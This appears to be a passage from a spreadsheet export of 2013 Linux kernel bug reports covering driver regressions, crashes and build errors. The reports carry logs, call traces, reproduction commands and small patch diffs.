    <t>I hope this is the right place to report this. After update from 3.6.11-1 to 3.7.4-1 on Arch Linux vgaswitcheroo stopped working. Downgrading to the previous kernel version (see above) solves the issue. Unfortunately according to the logs it should be working. However I'm sure it does not cause the temperatures are &gt;10°C higher than they should be (w/o load and CPU at lowest frequency). This is exactly the same behaviour as if I were not using vgaswitcheroo at all. Output: [root@hplaptop ~]# journalctl -b |grep switcheroo Jan 27 17:59:44 hplaptop kernel: VGA switcheroo: detected switching method \_SB_.PCI0.GFX0.ATPX handle Jan 27 17:59:44 hplaptop kernel: vga_switcheroo: enabled [root@hplaptop ~]# journalctl -b |grep radeon Jan 27 17:59:44 hplaptop kernel: [drm] radeon defaulting to kernel modesetting. Jan 27 17:59:44 hplaptop kernel: [drm] radeon kernel modesetting enabled. Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: enabling device (0000 -&gt; 0003) Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used) Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: GTT: 512M 0x0000000040000000 - 0x000000005FFFFFFF Jan 27 17:59:44 hplaptop kernel: [drm] radeon: 1024M of VRAM memory ready Jan 27 17:59:44 hplaptop kernel: [drm] radeon: 512M of GTT memory ready. Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: irq 46 for MSI/MSI-X Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: radeon: using MSI. Jan 27 17:59:44 hplaptop kernel: [drm] radeon: irq initialized. Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: WB enabled Jan 27 17:59:44 hplaptop kernel: radeon 0000:01:00.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff88015087cc00 Jan 27 17:59:44 hplaptop kernel: [drm] radeon: power management initialized Jan 27 17:59:44 hplaptop kernel: fb1: radeondrmfb frame buffer device Jan 27 17:59:44 hplaptop kernel: [drm] Initialized radeon 2.24.0 20080528 for 0000:01:00.0 on minor 1 Jan 27 17:59:44 hplaptop kernel: radeon: switched off Hardware: HP Pavilion dv6 CORE i5</t>
  </si>
  <si>
    <t>mounting path below symlink in cifs drive causes BUG</t>
  </si>
  <si>
    <t>3.0.0 - 3.8</t>
  </si>
  <si>
    <t>2013-01-30 10:07 UTC</t>
  </si>
  <si>
    <t>Kjell Braden</t>
  </si>
  <si>
    <t>2013-11-18 15:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 92221 [details] dmesg w/ call trace Consider the following tree: /srv/symtest /srv/symtest/dir /srv/symtest/dir/subdir /srv/symtest/link -&gt; dir this works: # mount.cifs //smbsrv/symtest/dir/subdir/ /mnt/ this causes oops: # mount.cifs //smbsrv/symtest/link/subdir/ /mnt/ This issue was introduced in commit fec11dd9a0109fe52fd631e5c510778d6cbff6cc.</t>
  </si>
  <si>
    <t>hda_intel: sound stops working after suspend to ram</t>
  </si>
  <si>
    <t>3.7.6</t>
  </si>
  <si>
    <t>2013-02-05 21:40 UTC</t>
  </si>
  <si>
    <t>2013-11-12 15:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 92591 [details] dmesg showing error messages On a fresh boot the sound card works fine. After a few suspends to ram (it doesn't necessarily happen after just one) the sound card stops working well. The sound comes out chopppy, as a series of clicks separated by 2 second or so silences. I see these messages in the kernel log right after resume: hda-intel: azx_get_response timeout, switching to polling mode: last cmd=0x00170503 hda-intel: No response from codec, disabling MSI: last cmd=0x00170503 hda_intel: azx_get_response timeout, switching to single_cmd mode: last cmd=0x00170503 The only way to fix the sound seems to be a reboot. I don't have this problem with v3.6.11, it appeared with kernel v3.7.1 (I have not tested v3.7). Right now I'm running 3.7.6 and the problem is still there. $ lspci | grep -i audio 00:1b.0 Audio device: Intel Corporation 5 Series/3400 Series Chipset High Definition Audio (rev 05) 01:00.1 Audio device: NVIDIA Corporation High Definition Audio Controller (rev a1) $ lsmod | grep snd snd_hda_codec_hdmi 24993 4 snd_hda_codec_idt 54740 1 snd_hda_intel 24840 6 snd_hda_codec 71155 3 snd_hda_codec_hdmi,snd_hda_codec_idt,snd_hda_intel snd_pcm 74322 3 snd_hda_codec_hdmi,snd_hda_codec,snd_hda_intel snd_page_alloc 7333 2 snd_pcm,snd_hda_intel snd_timer 17563 1 snd_pcm</t>
  </si>
  <si>
    <t>[next-20130204] irq 18: nobody cared</t>
  </si>
  <si>
    <t>next-20130204</t>
  </si>
  <si>
    <t>2013-02-10 14:06 UTC</t>
  </si>
  <si>
    <t>Peter Hurley</t>
  </si>
  <si>
    <t>2013-02-20 01:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 92851 [details] dmesg from next-20130204 Regression with next-20130204+ (from next-20130125): [ 36.199730] Call Trace: [ 36.199734] &lt;IRQ&gt; [&lt;ffffffff810f1076&gt;] __report_bad_irq+0x36/0xe0 [ 36.199754] [&lt;ffffffff810f152a&gt;] note_interrupt+0x1aa/0x200 [ 36.199761] [&lt;ffffffff8101edf2&gt;] ? mwait_idle+0x82/0x1b0 [ 36.199766] [&lt;ffffffff810eed89&gt;] handle_irq_event_percpu+0xc9/0x260 [ 36.199771] [&lt;ffffffff810eef68&gt;] handle_irq_event+0x48/0x70 [ 36.199776] [&lt;ffffffff810f20ba&gt;] handle_fasteoi_irq+0x5a/0x100 [ 36.199784] [&lt;ffffffff810182f2&gt;] handle_irq+0x22/0x40 [ 36.199792] [&lt;ffffffff8163a65a&gt;] do_IRQ+0x5a/0xd0 [ 36.199799] [&lt;ffffffff8163136d&gt;] common_interrupt+0x6d/0x6d [ 36.199803] &lt;EOI&gt; [&lt;ffffffff810f8e2a&gt;] ? rcu_eqs_enter_common+0x4a/0x320 [ 36.199823] [&lt;ffffffff8101edf2&gt;] ? mwait_idle+0x82/0x1b0 [ 36.199827] [&lt;ffffffff8101ed99&gt;] ? mwait_idle+0x29/0x1b0 [ 36.199834] [&lt;ffffffff8101f8a6&gt;] cpu_idle+0x116/0x130 [ 36.199846] [&lt;ffffffff8161997f&gt;] start_secondary+0x251/0x258 [ 36.199854] handlers: [ 36.199859] [&lt;ffffffff8147d450&gt;] usb_hcd_irq [ 36.199863] Disabling IRQ #18 Boot completes successfully but first touch of mouse or keyboard generates the call trace. Mouse and keyboard are usb wireless on usb bus 4. peter@thor:~$ lsusb Bus 001 Device 002: ID 0bc2:2000 Seagate RSS LLC Storage Adapter V3 (TPP) Bus 004 Device 002: ID 0764:0501 Cyber Power System, Inc. CP1500 AVR UPS Bus 004 Device 003: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 005 Device 002: ID 0a5c:4500 Broadcom Corp. BCM2046B1 USB 2.0 Hub (part of BCM2046 Bluetooth) Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 005 Device 003: ID 0a5c:4502 Broadcom Corp. Keyboard (Boot Interface Subclass) Bus 005 Device 004: ID 0a5c:4503 Broadcom Corp. Mouse (Boot Interface Subclass) Bus 005 Device 005: ID 0461:4d75 Primax Electronics, Ltd Rocketfish RF-FLBTAD Bluetooth Adapter [ 3.465011] uhci_hcd 0000:00:1d.2: setting latency timer to 64 [ 3.465019] uhci_hcd 0000:00:1d.2: UHCI Host Controller [ 3.465028] uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 4 [ 3.465066] uhci_hcd 0000:00:1d.2: irq 18, io base 0x0000ff40 [ 3.465199] hub 4-0:1.0: USB hub found [ 3.465206] hub 4-0:1.0: 2 ports detected git bisect blames this commit: 4f53509 (HEAD, refs/bisect/bad) PCI: Put pci_dev in device tree as early as possible I've attached dmesg &amp; /proc/interrupts for the following kernels: - next-20120204 - next-20120204+revert4f53509 (has issues but doesn't drop interrupts) - 3.8.0-rc7 (working) These messages in the bad dmesg log are interesting since PCI INT A is routed on irq 18 with the kernels that work. [ 8.983246] pci 0000:00:1e.0: can't derive routing for PCI INT A [ 8.983600] snd_ctxfi 0000:09:02.0: PCI INT A: no GSI - using ISA IRQ 5</t>
  </si>
  <si>
    <t>Speed and rate control regression for Intel Wireless 6230</t>
  </si>
  <si>
    <t>3.8-rcX</t>
  </si>
  <si>
    <t>2013-02-13 04:13 UTC</t>
  </si>
  <si>
    <t>2014-05-08 05:39 UTC</t>
  </si>
  <si>
    <t>Logs: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1103314 iwlwifi is abyssmally slow in 3.8 compared to 3.7 3.7: 84Mbps/40 3.8: 3Mbps/1 Workaround is loading iwlwifi with the 11n_disabled flag set at 1</t>
  </si>
  <si>
    <t>ath(9k) module reports beserk errors when not in use, related Oops</t>
  </si>
  <si>
    <t>2013-02-13 13:48 UTC</t>
  </si>
  <si>
    <t>Mark E.</t>
  </si>
  <si>
    <t>2013-10-15 16:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 93211 [details] syslog This seems to happen consistently when: 1) the wireless has been used, but then turned off and the interface taken down. 2) the system is subsequently suspended to ram When woken up, a backtrace appears in syslog immediately and then the message "ath: phy0: PLL4 meaurement not done", repeated endlessly many times per second. This will go on for hours if unnoticed and only stops when the ath9k module is removed. An example of this is in the top part of the attachment. I do not use the wireless much on this box, and after noticing this the first time I went back through my logs and it also occurred with my previous kernel, 3.6.2. After removing the ath9k module, the 'df' command "Failed" and an Oops appears in syslog whenever df is tried. An example of this is in the second part of the attachment.</t>
  </si>
  <si>
    <t>Lenovo Thinkpad X220: acpiphp broken from 3.6 onwards</t>
  </si>
  <si>
    <t>2013-02-14 06:55 UTC</t>
  </si>
  <si>
    <t>ALLurGroceries</t>
  </si>
  <si>
    <t>2013-05-02 00:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 93291 [details] lspci Distribution: Debian Sid AMD64 Hardware: Lenovo X220, i5-2520M, 8GB Hotplugging the expresscard no longer works after 3.5. Bisected to commit 71a83bd727cc31c5fe960c3758cb396267ff710e "PCI/PM: add runtime PM support to PCIe port" "Because runtime suspend is broken for some chipsets, a black list is used to disable runtime PM support for these chipsets." I'm not sure how the blacklist is supposed to look, so I reversed the test and the problem is gone. Here's a diff against 3.7.7: diff --git a/drivers/pci/pcie/portdrv_pci.c b/drivers/pci/pcie/portdrv_pci.c index ebb3e5f..b427aad 100644 --- a/drivers/pci/pcie/portdrv_pci.c +++ b/drivers/pci/pcie/portdrv_pci.c @@ -225,7 +225,7 @@ static int __devinit pcie_portdrv_probe(struct pci_dev *dev, * it by default. */ dev-&gt;d3cold_allowed = false; - if (!pci_match_id(port_runtime_pm_black_list, dev)) + if (pci_match_id(port_runtime_pm_black_list, dev)) pm_runtime_put_noidle(&amp;dev-&gt;dev); return 0;</t>
  </si>
  <si>
    <t>nfs unmount failures since 3.4.19</t>
  </si>
  <si>
    <t>3.4.31</t>
  </si>
  <si>
    <t>2013-02-17 10:58 UTC</t>
  </si>
  <si>
    <t>Fab</t>
  </si>
  <si>
    <t>2014-01-13 19:09 UTC</t>
  </si>
  <si>
    <t>Hi, I'm using kernel 3.4 series. Starting with kernel 3.4.19, I cannot unmount anymore some nfs4 shares. When mounting a nfs4 share on clients, the corresponding line into /proc/mounts does not match the line into /etc/mtab, this makes the unmount fail. For example : # mount /portage # grep portage /proc/mounts nfsserver://portage /portage nfs4 [... mount options] Notice the double slash which does not appear in /etc/mtab : # grep portage /etc/mtab nfsserver:/portage /portage nfs4 [... mount options] The double slash into /proc/mounts makes the unmount command unhappy : # umount /portage /portage was not found in /proc/mounts /portage was not found in /proc/mounts 3.4.18 --&gt; works fine 3.4.19 to 3.4.31 --&gt; does not work Thanks.</t>
  </si>
  <si>
    <t>No internet with kernel 3.7 or 3.8 with LAN</t>
  </si>
  <si>
    <t>since 3.7</t>
  </si>
  <si>
    <t>2013-02-17 13:37 UTC</t>
  </si>
  <si>
    <t>korn2012</t>
  </si>
  <si>
    <t>2016-05-30 08:12 UTC</t>
  </si>
  <si>
    <t>Hello since kernel update 3.7 or 3.8 I have no internet connection with LAN, wlan is working very well, with lan my internet connection is working for 5 minutes, then internet is not working anymore. I have to unplug the cable and the i have to plug it again - so it will work 5 minutes..... I have a netbook (acer aspire one d255) With kernel 3.5x everything is working fine. Problem is reported here (German) http://forum.ubuntuusers.de/topic/internet-verbindung-bricht-ab/ If you need more information, feel free to ask kind regards</t>
  </si>
  <si>
    <t>[regression][v3.8rc5-&gt;v3.8rc6] Ehci-pci fails with error -110 on read/64</t>
  </si>
  <si>
    <t>v3.8rc6</t>
  </si>
  <si>
    <t>2013-02-17 18:10 UTC</t>
  </si>
  <si>
    <t>2013-11-12 15:14 UTC</t>
  </si>
  <si>
    <t>Current head gives this when I plug a 'Mass Storage Device' into a 2.0 hub: [ 842.760400] hub 1-0:1.0: unable to enumerate USB device on port 3 [ 843.080058] usb 1-3: new high-speed USB device number 48 using ehci-pci [ 858.230072] usb 1-3: device descriptor read/64, error -110 [ 873.490070] usb 1-3: device descriptor read/64, error -110 Reverting the following commit makes it work again: commit 55bcdce8a8228223ec4d17d8ded8134ed265d2c5 Author: Alan Stern &lt;stern@rowland.harvard.edu&gt; Date: Fri Jan 25 16:52:45 2013 -0500 USB: EHCI: remove ASS/PSS polling timeout This patch (as1647) attempts to work around a problem that seems to affect some nVidia EHCI controllers. They sometimes take a very long time to turn off their async or periodic schedules. I don't know if this is a result of other problems, but in any case it seems wise not to depend on schedule enables or disables taking effect in any specific length of time. The patch removes the existing 20-ms timeout for enabling and disabling the schedules. The driver will now continue to poll the schedule state at 1-ms intervals until the controller finally decides to obey the most recent command issued by the driver. Just in case this hides a problem, a debugging message will be logged if the controller takes longer than 20 polls. I don't know if this will actually fix anything, but it can't hurt. Signed-off-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Tested-by: Piergiorgio Sartor &lt;piergiorgio.sartor@nexgo.de&gt; CC: &lt;stable@vger.kernel.org&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt; diff --git a/drivers/usb/host/ehci-timer.c b/drivers/usb/host/ehci-timer.c index 20dbdcb..f904071 100644 --- a/drivers/usb/host/ehci-timer.c +++ b/drivers/usb/host/ehci-timer.c @@ -113,14 +113,15 @@ static void ehci_poll_ASS(struct ehci_hcd *ehci) if (want != actual) { - /* Poll again later, but give up after about 20 ms */ - if (ehci-&gt;ASS_poll_count++ &lt; 20) { - ehci_enable_event(ehci, EHCI_HRTIMER_POLL_ASS, true); - return; - } - ehci_dbg(ehci, "Waited too long for the async schedule status (%x/%x), giving up\n", - want, actual); + /* Poll again later */ + ehci_enable_event(ehci, EHCI_HRTIMER_POLL_ASS, true); + ++ehci-&gt;ASS_poll_count; + return; } + + if (ehci-&gt;PSS_poll_count &gt; 20) + ehci_dbg(ehci, "PSS poll count reached %d\n", + ehci-&gt;PSS_poll_count); ehci-&gt;PSS_poll_count = 0; /* The status is up-to-date; restart or stop the schedule as needed */ Please note, that I'm using the 'irqpoll' cmdline to improve system stability.</t>
  </si>
  <si>
    <t>guest panic after live migration</t>
  </si>
  <si>
    <t>2013-02-19 03:05 UTC</t>
  </si>
  <si>
    <t>2013-03-01 07:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 93511 [details] guest panic after migration Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux (e.g. RHEL6.3) kvm.git next branch Commit:cbd29cb6e38af6119df2cdac0c58acf0e85c177e qemu-kvm.git Commit:4d9367b76f71c6d938cf8201392abe4bfb1136cb Hardware:SandyBridge-EP, Westmere-EP Bug detailed description: -------------------------- After live migration, guest will panic. This should be a KVM kernel bug. kvm + qemu-kvm = result cbd29cb6 + 4d9367b7 = bad b0da5bec + 4d9367b7 = good Reproduce steps: ---------------- 1. start up a host with kvm (commit: cbd29cb6) 2. Start a TCP daemon for migration: qemu-system-x86_64 -m 1024 -smp 2 -net nic,macaddr=00:12:32:45:12:54 -net tap /root/rhel6u3.img -incoming tcp:localhost:4444 3. create a guest qemu-system-x86_64 -m 1024 -smp 2 -net nic,macaddr=00:12:32:45:12:54 -net tap /root/rhel6u3.img 4. "ctrl+Alt+2" switch to QEMU monitor 5. in monitor: migrate tcp:localhost:4444 Current result: ---------------- after live migration, guest panic Expected result: ---------------- after live migration, guest work fine. Basic root-causing log: ---------------------- WARNING: at lib/list_debug.c:30 __list_add+0x8f/0xa0() (Tainted: G B W --------------- ) Hardware name: Bochs list_add corruption. prev-&gt;next should be next (ffff88003fae0ac0), but was ffff8800365c3000. (prev=ffff8800365f9040). Modules linked in: autofs4 sunrpc ipv6 uinput ppdev parport_pc parport microcode sg 8139too 8139cp mii i2c_piix4 i2c_core ext4 mbcache jbd2 sr_mod cdrom sd_mod crc_t10dif pata_acpi ata_generic ata_piix dm_mirror dm_region_hash dm_log dm_mod [last unloaded: speedstep_lib] Pid: 12, comm: events/1 Tainted: G B W --------------- 2.6.32-279.el6.x86_64 #1 Call Trace: [&lt;ffffffff8106b747&gt;] ? warn_slowpath_common+0x87/0xc0 [&lt;ffffffff8106b836&gt;] ? warn_slowpath_fmt+0x46/0x50 [&lt;ffffffff8128301f&gt;] ? __list_add+0x8f/0xa0 [&lt;ffffffff81163f64&gt;] ? free_block+0x154/0x170 [&lt;ffffffff811641b1&gt;] ? drain_array+0xc1/0x100 [&lt;ffffffff8116517e&gt;] ? cache_reap+0x8e/0x260 [&lt;ffffffff81137090&gt;] ? vmstat_update+0x0/0x40 [&lt;ffffffff811650f0&gt;] ? cache_reap+0x0/0x260 [&lt;ffffffff8108c760&gt;] ? worker_thread+0x170/0x2a0 [&lt;ffffffff810920d0&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff8108c5f0&gt;] ? worker_thread+0x0/0x2a0 [&lt;ffffffff81091d66&gt;] ? kthread+0x96/0xa0 [&lt;ffffffff8100c14a&gt;] ? child_rip+0xa/0x20 [&lt;ffffffff81091cd0&gt;] ? kthread+0x0/0xa0 [&lt;ffffffff8100c140&gt;] ? child_rip+0x0/0x20 ---[ end trace f17758832a0dcb5e ]--- general protection fault: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:03.0/irq CPU 1 Modules linked in: autofs4 sunrpc ipv6 uinput ppdev parport_pc parport microcode sg 8139too 8139cp mii i2c_piix4 i2c_core ext4 mbcache jbd2 sr_mod cdrom sd_mod crc_t10dif pata_acpi ata_generic ata_piix dm_mirror dm_region_hash dm_log dm_mod [last unloaded: speedstep_lib] Pid: 1173, comm: rs:main Q:Reg Tainted: G B W --------------- 2.6.32-279.el6.x86_64 #1 Bochs Bochs RIP: 0010:[&lt;ffffffff81282f00&gt;] [&lt;ffffffff81282f00&gt;] list_del+0x10/0xa0 RSP: 0018:ffff880037547a78 EFLAGS: 00010096 RAX: dead000000200200 RBX: ffffea0000ceb940 RCX: 0000000000000000 RDX: 0000000000000010 RSI: ffff88003edd00d0 RDI: ffffea0000ceb940 RBP: ffff880037547a88 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff88003edd00c0 R13: ffff8800000116c0 R14: 000000000000362e R15: ffffea0000ceb918 FS: 00007fc44b7cc700(0000) GS:ffff880002300000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fc44c5aba10 CR3: 000000003dc44000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process rs:main Q:Reg (pid: 1173, threadinfo ffff880037546000, task ffff880037062ae0) Stack: 0000000000000282 0000000000000001 ffff880037547ba8 ffffffff811258a8 &lt;d&gt; ffff880037547ab8 0000000000000000 ffffffff00000001 ffff88003728b400 &lt;d&gt; 0000000000c7f118 00000040ffffffff 0000000000000000 ffff880000033c28 Call Trace: [&lt;ffffffff811258a8&gt;] get_page_from_freelist+0x288/0x820 [&lt;ffffffffa00869f6&gt;] ? jbd2_journal_stop+0x1e6/0x2b0 [jbd2] [&lt;ffffffff81126f31&gt;] __alloc_pages_nodemask+0x111/0x940 [&lt;ffffffff81161d62&gt;] kmem_getpages+0x62/0x170 [&lt;ffffffff811623cf&gt;] cache_grow+0x2cf/0x320 [&lt;ffffffff81162622&gt;] cache_alloc_refill+0x202/0x240 [&lt;ffffffff8116351f&gt;] kmem_cache_alloc+0x15f/0x190 [&lt;ffffffff811b9738&gt;] fsnotify_create_event+0x38/0x1a0 [&lt;ffffffff811b9430&gt;] fsnotify+0x140/0x160 [&lt;ffffffff8117b0e2&gt;] vfs_write+0x132/0x1a0 [&lt;ffffffff8117ba81&gt;] sys_write+0x51/0x90 [&lt;ffffffff8100b0f2&gt;] system_call_fastpath+0x16/0x1b Code: 89 95 fc fe ff ff e9 ab fd ff ff 4c 8b ad e8 fe ff ff e9 db fd ff ff 90 90 90 90 55 48 89 e5 53 48 89 fb 48 83 ec 08 48 8b 47 08 &lt;4c&gt; 8b 00 4c 39 c7 75 39 48 8b 03 4c 8b 40 08 4c 39 c3 75 4c 48 RIP [&lt;ffffffff81282f00&gt;] list_del+0x10/0xa0 RSP &lt;ffff880037547a78&gt; ---[ end trace f17758832a0dcb5f ]--- Kernel panic - not syncing: Fatal exception Pid: 1173, comm: rs:main Q:Reg Tainted: G B D W --------------- 2.6.32-279.el6.x86_64 #1 Call Trace: [&lt;ffffffff814fd11a&gt;] ? panic+0xa0/0x168 [&lt;ffffffff815012b4&gt;] ? oops_end+0xe4/0x100 [&lt;ffffffff8100f26b&gt;] ? die+0x5b/0x90 [&lt;ffffffff81500e22&gt;] ? do_general_protection+0x152/0x160 [&lt;ffffffff815005f5&gt;] ? general_protection+0x25/0x30 [&lt;ffffffff81282f00&gt;] ? list_del+0x10/0xa0 [&lt;ffffffff811248d2&gt;] ? bad_page+0x52/0x160 [&lt;ffffffff811258a8&gt;] ? get_page_from_freelist+0x288/0x820 [&lt;ffffffffa00869f6&gt;] ? jbd2_journal_stop+0x1e6/0x2b0 [jbd2] [&lt;ffffffff81126f31&gt;] ? __alloc_pages_nodemask+0x111/0x940 [&lt;ffffffff81161d62&gt;] ? kmem_getpages+0x62/0x170 [&lt;ffffffff811623cf&gt;] ? cache_grow+0x2cf/0x320 [&lt;ffffffff81162622&gt;] ? cache_alloc_refill+0x202/0x240 [&lt;ffffffff8116351f&gt;] ? kmem_cache_alloc+0x15f/0x190 [&lt;ffffffff811b9738&gt;] ? fsnotify_create_event+0x38/0x1a0 [&lt;ffffffff811b9430&gt;] ? fsnotify+0x140/0x160 [&lt;ffffffff8117b0e2&gt;] ? vfs_write+0x132/0x1a0 [&lt;ffffffff8117ba81&gt;] ? sys_write+0x51/0x90 [&lt;ffffffff8100b0f2&gt;] ? system_call_fastpath+0x16/0x1b</t>
  </si>
  <si>
    <t>ia64: linux-3.8.0/drivers/acpi/osl.c:629:29: error: ‘max_low_pfn_mapped’ undeclared</t>
  </si>
  <si>
    <t>3.8.0</t>
  </si>
  <si>
    <t>2013-02-19 11:49 UTC</t>
  </si>
  <si>
    <t>Dennis Schridde</t>
  </si>
  <si>
    <t>2013-02-28 04:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 93531 [details] config-3.8.0 CC drivers/acpi/osl.o /usr/src/linux-3.8.0/drivers/acpi/osl.c: In function ‘acpi_initrd_override’: /usr/src/linux-3.8.0/drivers/acpi/osl.c:629:29: error: ‘max_low_pfn_mapped’ undeclared (first use in this function) /usr/src/linux-3.8.0/drivers/acpi/osl.c:629:29: note: each undeclared identifier is reported only once for each function it appears in make[4]: *** [drivers/acpi/osl.o] Error 1</t>
  </si>
  <si>
    <t>(FIXED) Unable to boot without disabling KMS: ATI Mobility Radeon X1300</t>
  </si>
  <si>
    <t>3.5.X - 3.9.3 (Fixed somewhere between 3.9.3 and 3.10)</t>
  </si>
  <si>
    <t>2013-02-21 06:45 UTC</t>
  </si>
  <si>
    <t>Waf Flez</t>
  </si>
  <si>
    <t>2013-11-12 13:49 UTC</t>
  </si>
  <si>
    <t>Since the 3.5 series of the Linux kernel, and in every Linux kernel version since, I am unable to boot into my laptop without disabling KMS. Specs: Comp Model: HP Compaq nc6400 CPU: Intel Core Duo T2500 RAM: 4GB DDR2 RAM GPU: ATI Mobility Radeon X1300 Tested many Linux kernel versions before 3.5. and booting is completely possible and works without a hitch.</t>
  </si>
  <si>
    <t>backlight: setting backlight level don't always work on HP Compaq 6735s</t>
  </si>
  <si>
    <t>3.2.35</t>
  </si>
  <si>
    <t>2013-02-23 00:00 UTC</t>
  </si>
  <si>
    <t>Alexis M.</t>
  </si>
  <si>
    <t>2013-05-06 05:45 UTC</t>
  </si>
  <si>
    <t>When I want to change the backlight level, I use the command: echo -n [level] &gt; /sys/class/backlight/acpi_video0/brightness But the actual backlight level often does not change, if I run this command several times, it will works, but only after a certain time (so 10 times the commands in 3 seconds does not work better than 4 in 3 seconds) Reading the 'actual_brightness' can sometimes change the actual brightness (according to the last value written in 'brightness'). Expecting result: the actual real backlight level change when writting to '/sys/class/backlight/acpi_video0/brightness' This bug can cause the kernel to disable backlight management when it check if the _BQC acpi method return an index (2 to 13 or something like that) or a level (0 to 100). When this bug occur at boot time, the kernel do that: set the backlight level to max, ie 100 get the backlight level, at this time, the real backlight level can change to the lowest level (for me it's 30) and the function that retrieve the result of the _BQC method return 30. The kernel compare levels and as 30 != 100, assume the returned value is an index. Then the kernel tries to set the level to a invalid value and cause the backlight management to be disabled. When the backlight management is disabled, there is nothing in the /sys/class/backlight folder. The code doing that is in drivers/acpi/video.c when executing: result = acpi_video_device_lcd_set_level(device, max_level); [...] result = acpi_video_device_lcd_get_level_current(device, &amp;level, 0); [...] br-&gt;flags._BQC_use_index = (level == max_level ? 0 : 1); [...] level = br-&gt;levels[level_old]; &lt;-- at this time, level_old is not in the range of the array as it's &gt; 30, thus reading an invalid value (but does not crash) I tested several kernel version and discovered that this bug occur at least since kernel version 2.6.38. Kernel 2.6.34.14 works fine, the backlight is working as expected. 2.6.35 and 2.6.37.6 is hanging at boot, when populating /dev. 3.7 does not work, same problem as stated here. When the kernel 2.6.35 or 2.6.37.6 is hanging, after some times (or because I pressed the power button ?), udev tries to kill modprobe processes (but can't). ACPI is mentionned in something like 'ACPI0001'. This hang already occured for the newer kernel (&gt;2.6.38) but I can't at this time say if it's from the same cause.</t>
  </si>
  <si>
    <t>Hibernate not working with kernel 3.7 and 3.8</t>
  </si>
  <si>
    <t>3.7.9 3.8.0</t>
  </si>
  <si>
    <t>2013-02-23 20:37 UTC</t>
  </si>
  <si>
    <t>Esteban Taroni</t>
  </si>
  <si>
    <t>2013-06-23 21:34 UTC</t>
  </si>
  <si>
    <t>Hello, Running gentoo with kernel 3.6.11 (hibernation and suspend work) Upgrading to 3.7 or 3.8 break hibernation and the computer freeze. Suspend work. Testing with this page http://www.mjmwired.net/kernel/Documentation/power/basic-pm-debugging.txt All is ok except processors and core (black screen and kernel panic). I've tried to hibernate with just one core online and everything worked echo 0 &gt; /sys/devices/system/cpu/cpu*/online Don't know what information you need. Thx</t>
  </si>
  <si>
    <t>kernel panic when parallel remove pci device triggered by sysfs/pci interface</t>
  </si>
  <si>
    <t>3.8.rc6</t>
  </si>
  <si>
    <t>2013-02-25 02:29 UTC</t>
  </si>
  <si>
    <t>Gu Zheng</t>
  </si>
  <si>
    <t>2013-11-13 22:07 UTC</t>
  </si>
  <si>
    <t>Created attachment 94021 [details] lspci info When we used a test script: echo -n 1 &gt; /sys/bus/pci/devices/0000\:10\:00.0/remove ; echo -n 1 &gt; /sys/bus/pci/devices/0000\:1a\:01.0/remove to test parallel remove routines triggered by sysfs/pci interface, the kernel panicked. [ 328.037479] general protection fault: 0000 [#1] SMP [ 328.096991] Modules linked in: ip6table_filter ip6_tables ebtable_nat ebtables nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM iptable_mangle iptable_filter ip_tables bridge stp llc sunrpc binfmt_misc dm_mirror dm_region_hash dm_log dm_mod vhost_net macvtap macvlan tun uinput iTCO_wdt iTCO_vendor_support coretemp kvm_intel kvm crc32c_intel microcode pcspkr lpc_ich mfd_core sg i2c_i801 i2c_core ioatdma i7core_edac edac_core e1000e igb dca ptp pps_core sd_mod crc_t10dif megaraid_sas mptsas mptscsih mptbase scsi_transport_sas scsi_mod [ 328.697122] CPU 6 [ 328.719040] Pid: 6, comm: kworker/u:0 Tainted: G W 3.8.0-rc6-aspm-pcie-fix+ #58 FUJITSU-SV PRIMEQUEST 1800E/SB [ 328.851117] RIP: 0010:[&lt;ffffffff813928f8&gt;] [&lt;ffffffff813928f8&gt;] pcie_aspm_exit_link_state+0x38/0x190 [ 328.961428] RSP: 0018:ffff8807bde17c48 EFLAGS: 00010202 [ 329.024874] RAX: ffff8807bb4a1290 RBX: 6b6b6b6b6b6b6b6b RCX: 0000000000000006 [ 329.110125] RDX: 0000000000000006 RSI: ffff8807bde1afc8 RDI: 0000000000000246 [ 329.195371] RBP: ffff8807bde17c68 R08: 0000000000000001 R09: 0000000000000001 [ 329.280619] R10: 0000000000000003 R11: 0000000000000001 R12: ffff8807bb49b3d8 [ 329.365869] R13: ffff8807bb49b3d8 R14: ffffffff82126d80 R15: ffff8807bde17d58 [ 329.451127] FS: 0000000000000000(0000) GS:ffff8807c2600000(0000) knlGS:0000000000000000 [ 329.547796] CS: 0010 DS: 0000 ES: 0000 